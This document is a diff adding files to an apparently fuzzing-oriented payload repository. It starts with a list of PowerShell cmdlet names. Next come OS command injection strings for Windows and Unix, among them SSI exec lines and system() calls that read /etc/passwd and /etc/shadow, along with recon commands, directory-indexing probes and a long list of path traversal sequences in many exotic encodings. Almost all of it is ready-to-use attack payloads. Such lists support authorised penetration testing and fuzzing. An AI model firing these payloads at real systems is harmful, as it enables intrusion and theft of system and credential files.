get-authenticodesignature
|
||||
set-authenticodesignature
|
||||
set-location
|
||||
get-childitem
|
||||
get-command
|
||||
measure-command
|
||||
trace-command
|
||||
add-content
|
||||
get-content
|
||||
set-content
|
||||
clear-content
|
||||
convertto-html
|
||||
convertfrom-securestring
|
||||
convertto-securestring
|
||||
clear-host
|
||||
clear-item
|
||||
copy-item
|
||||
get-credential
|
||||
get-childitem
|
||||
get-date
|
||||
set-date
|
||||
remove-item
|
||||
do
|
||||
get-psdrive
|
||||
new-psdrive
|
||||
remove-psdrive
|
||||
get-eventlog
|
||||
get-executionpolicy
|
||||
set-executionpolicy
|
||||
export-alias
|
||||
export-clixml
|
||||
export-console
|
||||
export-csv
|
||||
invoke-expression
|
||||
exit
|
||||
foreach-object
|
||||
foreach
|
||||
for
|
||||
format-custom
|
||||
format-list
|
||||
format-table
|
||||
format-wide
|
||||
get-item
|
||||
get-childitem
|
||||
get-help
|
||||
add-history
|
||||
get-history
|
||||
invoke-history
|
||||
get-host
|
||||
clear-host
|
||||
read-host
|
||||
write-host
|
||||
if
|
||||
import-clixml
|
||||
import-csv
|
||||
get-item
|
||||
invoke-item
|
||||
new-item
|
||||
remove-item
|
||||
set-item
|
||||
clear-itemproperty
|
||||
copy-itemproperty
|
||||
get-itemproperty
|
||||
move-itemproperty
|
||||
new-itemproperty
|
||||
remove-itemproperty
|
||||
rename-itemproperty
|
||||
set-itemproperty
|
||||
stop-process
|
||||
get-location
|
||||
pop-location
|
||||
push-location
|
||||
set-location
|
||||
add-member
|
||||
get-member
|
||||
move-item
|
||||
compare-object
|
||||
group-object
|
||||
measure-object
|
||||
new-object
|
||||
select-object
|
||||
sort-object
|
||||
where-object
|
||||
out-default
|
||||
out-file
|
||||
out-host
|
||||
out-null
|
||||
out-printer
|
||||
out-string
|
||||
powershell
|
||||
convert-path
|
||||
join-path
|
||||
resolve-path
|
||||
split-path
|
||||
test-path
|
||||
get-pfxcertificate
|
||||
pop-location
|
||||
push-location
|
||||
get-process
|
||||
stop-process
|
||||
clear-itemproperty
|
||||
copy-itemproperty
|
||||
get-itemproperty
|
||||
move-itemproperty
|
||||
new-itemproperty
|
||||
remove-itemproperty
|
||||
rename-itemproperty
|
||||
set-itemproperty
|
||||
get-psprovider
|
||||
set-psdebug
|
||||
add-pssnapin
|
||||
get-pssnapin
|
||||
remove-pssnapin
|
||||
quest
|
||||
read-host
|
||||
remove-item
|
||||
rename-item
|
||||
rename-itemproperty
|
||||
run/call
|
||||
select-object
|
||||
get-service
|
||||
new-service
|
||||
restart-service
|
||||
resume-service
|
||||
set-service
|
||||
sort-object
|
||||
start-service
|
||||
stop-service
|
||||
suspend-service
|
||||
start-sleep
|
||||
switch
|
||||
select-string
|
||||
tee-object
|
||||
new-timespan
|
||||
trace-command
|
||||
get-tracesource
|
||||
set-tracesource
|
||||
start-transcript
|
||||
stop-transcript
|
||||
get-uiculture
|
||||
get-unique
|
||||
update-formatdata
|
||||
update-typedata
|
||||
clear-variable
|
||||
get-variable
|
||||
new-variable
|
||||
remove-variable
|
||||
set-variable
|
||||
where-object
|
||||
where
|
||||
while
|
||||
get-wmiobject
|
||||
write-debug
|
||||
write-error
|
||||
write-output
|
||||
write-progress
|
||||
write-verbose
|
||||
write-warning
|
20
attack/os-cmd-execution/OSCommandInject.Windows.txt
Normal file
20
attack/os-cmd-execution/OSCommandInject.Windows.txt
Normal file
|
@ -0,0 +1,20 @@
|
|||
+|+Dir+c:\
|
||||
$+|+Dir+c:\
|
||||
%26%26+|+dir c:\
|
||||
$%26%26dir c:\
|
||||
%0a+dir+c:\
|
||||
+|+Dir+c:%255c
|
||||
$+|+Dir+c:%255c
|
||||
%26%26+|+dir c:%255c
|
||||
$%26%26dir+c:%255c
|
||||
%0a+dir+c:%255c
|
||||
+|+Dir+c:%2f
|
||||
$+|+Dir+c:%2f
|
||||
%26%26+|+dir c:%2f
|
||||
$%26%26dir+c:%2f
|
||||
%0a+dir+c:%2f
|
||||
+dir+c:\+|
|
||||
+|+dir+c:\+|
|
||||
+|+dir+c:%2f+|
|
||||
dir+c:\
|
||||
||+dir|c:\
|
70
attack/os-cmd-execution/command-execution-unix.txt
Normal file
70
attack/os-cmd-execution/command-execution-unix.txt
Normal file
|
@ -0,0 +1,70 @@
|
|||
<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->
|
||||
<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->
|
||||
<!--#exec%20cmd="/usr/bin/id;-->
|
||||
<!--#exec%20cmd="/usr/bin/id;-->
|
||||
/index.html|id|
|
||||
;id;
|
||||
;id
|
||||
;netstat -a;
|
||||
;id;
|
||||
|id
|
||||
|/usr/bin/id
|
||||
|id|
|
||||
|/usr/bin/id|
|
||||
||/usr/bin/id|
|
||||
|id;
|
||||
||/usr/bin/id;
|
||||
;id|
|
||||
;|/usr/bin/id|
|
||||
\n/bin/ls -al\n
|
||||
\n/usr/bin/id\n
|
||||
\nid\n
|
||||
\n/usr/bin/id;
|
||||
\nid;
|
||||
\n/usr/bin/id|
|
||||
\nid|
|
||||
;/usr/bin/id\n
|
||||
;id\n
|
||||
|usr/bin/id\n
|
||||
|nid\n
|
||||
`id`
|
||||
`/usr/bin/id`
|
||||
a);id
|
||||
a;id
|
||||
a);id;
|
||||
a;id;
|
||||
a);id|
|
||||
a;id|
|
||||
a)|id
|
||||
a|id
|
||||
a)|id;
|
||||
a|id
|
||||
|/bin/ls -al
|
||||
a);/usr/bin/id
|
||||
a;/usr/bin/id
|
||||
a);/usr/bin/id;
|
||||
a;/usr/bin/id;
|
||||
a);/usr/bin/id|
|
||||
a;/usr/bin/id|
|
||||
a)|/usr/bin/id
|
||||
a|/usr/bin/id
|
||||
a)|/usr/bin/id;
|
||||
a|/usr/bin/id
|
||||
;system('cat%20/etc/passwd')
|
||||
;system('id')
|
||||
;system('/usr/bin/id')
|
||||
%0Acat%20/etc/passwd
|
||||
%0A/usr/bin/id
|
||||
%0Aid
|
||||
%0A/usr/bin/id%0A
|
||||
%0Aid%0A
|
||||
& ping -i 30 127.0.0.1 &
|
||||
& ping -n 30 127.0.0.1 &
|
||||
%0a ping -i 30 127.0.0.1 %0a
|
||||
`ping 127.0.0.1`
|
||||
| id
|
||||
& id
|
||||
; id
|
||||
%0a id %0a
|
||||
`id`
|
||||
$;/usr/bin/id
|
|
@ -0,0 +1,6 @@
|
|||
..%255c
|
||||
.%5c../..%5c
|
||||
/..%c0%9v../
|
||||
/..%c0%af../
|
||||
/..%255c..%255c
|
||||
|
10
attack/os-cmd-execution/useful-commands-unix.txt
Normal file
10
attack/os-cmd-execution/useful-commands-unix.txt
Normal file
|
@ -0,0 +1,10 @@
|
|||
uname -n -s
|
||||
whoami
|
||||
pwd
|
||||
last
|
||||
cat /etc/passwd
|
||||
ls -la /tmp
|
||||
ls -la /home
|
||||
ping -i 30 127.0.0.1
|
||||
ping 127.0.0.1
|
||||
ping -n 30
|
3
attack/os-cmd-execution/useful-commands-windows.txt
Normal file
3
attack/os-cmd-execution/useful-commands-windows.txt
Normal file
|
@ -0,0 +1,3 @@
|
|||
ver
|
||||
chdir
|
||||
echo %USERNAME%
|
7
attack/os-dir-indexing/directory-indexing.txt
Normal file
7
attack/os-dir-indexing/directory-indexing.txt
Normal file
|
@ -0,0 +1,7 @@
|
|||
;dir
|
||||
`dir`
|
||||
|dir|
|
||||
|dir
|
||||
/%3f.jsp
|
||||
?M=D
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
6
attack/path-traversal/path-traversal-windows.txt
Normal file
6
attack/path-traversal/path-traversal-windows.txt
Normal file
|
@ -0,0 +1,6 @@
|
|||
C:/inetpub/wwwroot/global.asa
|
||||
C:\inetpub\wwwroot\global.asa
|
||||
C:/boot.ini
|
||||
C:\boot.ini
|
||||
D:\inetpub\wwwroot\global.asa
|
||||
D:/inetpub/wwwroot/global.asa
|
887
attack/path-traversal/traversals-8-deep-exotic-encoding.txt
Normal file
887
attack/path-traversal/traversals-8-deep-exotic-encoding.txt
Normal file
|
@ -0,0 +1,887 @@
|
|||
/../{FILE}
|
||||
/../../{FILE}
|
||||
/../../../{FILE}
|
||||
/../../../../{FILE}
|
||||
/../../../../../{FILE}
|
||||
/../../../../../../{FILE}
|
||||
/../../../../../../../{FILE}
|
||||
/../../../../../../../../{FILE}
|
||||
/..%2f{FILE}
|
||||
/..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/..%252f{FILE}
|
||||
/..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/..\{FILE}
|
||||
/..\..\{FILE}
|
||||
/..\..\..\{FILE}
|
||||
/..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\..\..\..\{FILE}
|
||||
/..%255c{FILE}
|
||||
/..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/..%c0%af{FILE}
|
||||
/..%c0%af..%c0%af{FILE}
|
||||
/..%c0%af..%c0%af..%c0%af{FILE}
|
||||
/..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
|
||||
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
|
||||
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
|
||||
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
|
||||
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
|
||||
/%c0%ae%c0%ae/{FILE}
|
||||
/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
|
||||
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
|
||||
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
|
||||
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
|
||||
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
|
||||
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
|
||||
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
|
||||
/%c0%ae%c0%ae%c0%af{FILE}
|
||||
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
|
||||
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
|
||||
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
|
||||
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
|
||||
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
|
||||
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
|
||||
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
|
||||
/..%25c0%25af{FILE}
|
||||
/..%25c0%25af..%25c0%25af{FILE}
|
||||
/..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
|
||||
/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
|
||||
/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
|
||||
/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
|
||||
/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
|
||||
/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
|
||||
/%25c0%25ae%25c0%25ae/{FILE}
|
||||
/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
|
||||
/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
|
||||
/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
|
||||
/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
|
||||
/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
|
||||
/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
|
||||
/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c0%25af{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
|
||||
/..%c1%9c{FILE}
|
||||
/..%c1%9c..%c1%9c{FILE}
|
||||
/..%c1%9c..%c1%9c..%c1%9c{FILE}
|
||||
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
|
||||
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
|
||||
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
|
||||
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
|
||||
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
|
||||
/%c0%ae%c0%ae\{FILE}
|
||||
/%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
|
||||
/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
|
||||
/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
|
||||
/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
|
||||
/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
|
||||
/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
|
||||
/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
|
||||
/%c0%ae%c0%ae%c1%9c{FILE}
|
||||
/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
|
||||
/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
|
||||
/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
|
||||
/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
|
||||
/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
|
||||
/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
|
||||
/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
|
||||
/..%25c1%259c{FILE}
|
||||
/..%25c1%259c..%25c1%259c{FILE}
|
||||
/..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
|
||||
/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
|
||||
/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
|
||||
/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
|
||||
/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
|
||||
/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
|
||||
/%25c0%25ae%25c0%25ae\{FILE}
|
||||
/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
|
||||
/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
|
||||
/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
|
||||
/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
|
||||
/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
|
||||
/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
|
||||
/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c1%259c{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
|
||||
